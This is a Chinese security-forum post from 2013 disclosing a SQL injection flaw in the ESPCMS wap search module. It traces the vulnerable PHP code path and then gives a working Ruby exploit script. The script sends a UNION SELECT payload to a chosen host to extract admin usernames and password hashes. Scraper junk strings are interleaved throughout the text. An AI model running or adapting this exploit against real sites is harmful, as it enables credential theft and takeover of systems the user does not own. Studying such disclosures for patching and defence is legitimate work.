中国网络渗透测试联盟
标题:
espcms wap模块搜索处SQL注入
[打印本页]
作者:
admin
时间:
2013-7-27 18:31
标题:
espcms wap模块搜索处SQL注入
0×0 漏洞概述0×1 漏洞细节
- L- B1 h" `+ G! A3 O; p' J
0×2 PoC
6 I: Q0 d3 Y' f6 f) x! C
% s) `. k2 l. y8 V
3 j j" \0 _7 B5 B, _* l4 I
. e" F! g# U h e8 F- S
0×0 漏洞概述
' N- a" K0 j" p W+ y/ P
7 ~; k$ U2 J* s7 K. ]
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
C q! U7 b* ]2 c7 X
其在处理传入的参数时考虑不严谨导致
SQL注入
发生
" L- X. s0 n. f: S: z9 W
) n- b; l# R8 a% y
+ c! m% ?, G- U9 F8 q" V! r* X, O
0×1 漏洞细节
! O; A C5 @) w4 S
( Q. a) M* n2 j
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
% D7 v1 ^$ Y9 u7 E2 ~/ I s1 s
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
, ]% ~( t* w# |) Q$ ]
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的
SQL注入
。
" d6 ^8 w% T, s0 C
8 m9 K! R4 ]; P; J% |
在/interface/3gwap_search.php文件的in_result函数中:
9 C9 t* B, z8 r+ u9 ~
0 [$ }+ D4 H- x( ^" b& }2 t4 [
) M7 C' G' ~# ?+ a) b3 M4 t2 k5 Z
# ]! i$ g, i# J# y0 T
function in_result() {
' d3 b- ^. I' D) z
... ... ... ... ... ... ... ... ...
" j, W! B5 X A9 W
$urlcode = $_SERVER[ 'QUERY_STRING '];
$ m! D4 Z* W, S2 I L
parse_str(html_entity_decode($urlcode), $output);
$ C! V" f* Z! X/ W* G7 k+ F
0 A9 W/ Y$ H, j. k% H
... ... ... ... ... ... ... ... ...
" N! ?8 P! j o6 G1 d$ h7 O
if (is_array($output['attr' ]) && count($output['attr']) > 0) {
5 `; |" m% v6 w3 D( M
: b/ j4 X; m b/ l* y
$db_table = db_prefix . 'model_att';
- G' o; ~( N* T+ _
* e+ q) d8 X* C# a1 Z& x$ L
foreach ($output['attr' ] as $key => $value) {
1 \; F& s0 p: L. \* q
if ($value) {
/ u* b' r" n* a4 o9 W
4 a2 W! i6 y x$ K
$key = addslashes($key);
$ e7 V# A+ e/ N
$key = $this-> fun->inputcodetrim($key);
* b, `0 F9 B/ d9 O7 D
$db_att_where = " WHERE isclass=1 AND attrname='$key'";
7 _7 o! u: S x, u/ n2 H" [
$countnum = $this->db_numrows($db_table, $db_att_where);
: g/ a) r. `' w3 j
if ($countnum > 0) {
) D5 H7 |8 X4 k; @+ a3 K3 R, @: o
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
8 a$ {( o: g4 H: V6 L
}
1 _( ~$ V* C1 z" s6 X! h; [
}
4 w& C5 p4 U. `3 B& b- P( H- M7 p
}
5 k/ U) i' N( c2 V* w3 Q! C' m2 B
}
' h, V9 q; P x) n3 J* W4 F6 g8 q6 X
if (!empty ($keyword) && empty($keyname)) {
; x& s4 b$ O( j
$keyname = 'title';
1 i* | k; _3 p( q8 Q! W
$db_where.= " AND a.title like '%$keyword%'" ;
7 a1 s, |$ |3 [ T' U2 k! f! B
} elseif (!empty ($keyword) && !empty($keyname)) {
+ V! k) Y. K& i4 B. x6 e6 B
$db_where.= " AND $keyname like '% $keyword%'";
v/ }1 E: B; O \
}
; i8 s- M$ a# m5 A' M( S% w
$pagemax = 15;
& V/ C9 [ z0 U4 p( C
' n) L# I0 O n
$pagesylte = 1;
. V+ k- n% {7 E7 y
) N P: C( e1 }, R3 J& U
if ($countnum > 0) {
& q- | X& e$ b' m/ S
' e" _# p3 D) I4 [* q
$numpage = ceil($countnum / $pagemax);
9 m0 q2 F9 O9 {# N
} else {
) z7 \- A+ f5 _+ v' ?
$numpage = 1;
# v4 z0 Q6 o0 O9 X0 H+ _
}
: ^ @; h9 @3 w5 @/ _
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
0 F+ e) W* t" D
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
) C( A7 H4 ^' Q1 j8 o) Q# O+ Y( w
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
$ A4 B. o: x, w. q
... ... ... ... ... ... ... ... ...
' Q8 e Y* p" S9 C) h) @
}
6 |9 ^/ q* M) h% Q. w( ?
' |- z" r3 v4 m: u
: z" c' |" x- s: `3 m
0×2 PoC
8 c+ v; N F- t5 \) o
( }! T% A4 h; }! F" O! _! i
3 @- |1 [" r9 q% {; S0 V' b
1 {3 m8 U' h; ~2 C' l# u: L/ k, }
require "net/http"
* v* |; ^; f5 Y, {
# a- M9 |0 a' Y' k% l& y' j; `( E
def request(method, url)
$ T% D7 r" s6 t: y; U
if method.eql?("get")
; Z5 G+ Z" Y0 C
uri = URI.parse(url)
' X3 f! q$ o v7 Q* v' ^. z
http = Net::HTTP.new(uri.host, uri.port)
" ^9 T0 T" x( y1 x' w
response = http.request(Net::HTTP::Get.new(uri.request_uri))
; W9 j' r- o3 H0 Y
return response
2 ]( u$ t: ]( u4 o
end
. X/ f7 h8 v. ~" }& S, Z& e
end
' |6 I/ j9 [$ e# O. Z" v
. s, F$ N! c% I" x# R( j
doc =<<HERE
* M* \8 ^4 K& A6 z, }. k1 q7 A, t& |
-------------------------------------------------------
5 T# h; c9 L& q8 N- x
Espcms Injection Exploit
7 n( Q1 p! S, y3 c2 X5 n# u3 D# i
Author:ztz
% e5 G- j3 {# a0 M6 s! _
Blog:
http://ztz.fuzzexp.org/
1 k( I$ B6 y! C
-------------------------------------------------------
: G+ M N' Y( W' x+ e
L% \& z0 `: X1 B0 o3 h
HERE
& \7 K8 k, O. q) P
' d/ W: v8 r% _( @
usage =<<HERE
6 P" b7 E: r" x+ G
Usage: ruby #{$0} host port path
8 L- S$ U6 U/ L M K9 R
example: ruby #{$0}
www.target.com
80 /
: G0 F- F8 R) C* h2 H
HERE
. n, y: @" {3 r4 F; w' m1 x8 [
% v+ o, y0 j; v/ F' g: r
puts doc
' Q, C+ J: @. ~0 o4 c6 {
if ARGV.length < 3
( Z/ M* S6 j/ I* o9 r6 ^
puts usage
7 \4 h( s8 Y2 f$ a
else
# {' S$ G$ ]# l+ D @3 F3 s
$host = ARGV[0]
4 N! u, u" q7 e* y" y I' g
$port = ARGV[1]
! W* F1 V6 A2 L
$path = ARGV[2]
! h& y" Q& D, X. e
/ U1 r* M& a# |; s
puts "
send request..."
3 _# i; q+ ~- q8 ^" `# v w+ U7 |
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
7 K q' Q& I6 a" N& P, f+ I
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
" z. B& A: W h( i. [3 Y- }4 s; B9 y: U
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
0 k8 @6 c/ V- b: K8 [" ?
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
2 R- Y- W# b5 K. Q
response = request("get", url)
7 } C) R0 ? F1 f3 ^
result = response.body.scan(/\w+&\w{32}/)
0 \& \6 u V/ K8 L( C( b+ W
puts result
; p& m: ?' Y0 ~7 y6 n
end
( _. c2 l' |0 i, w! B# U" N
. n6 \& `( L# _3 o/ g3 o; u
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2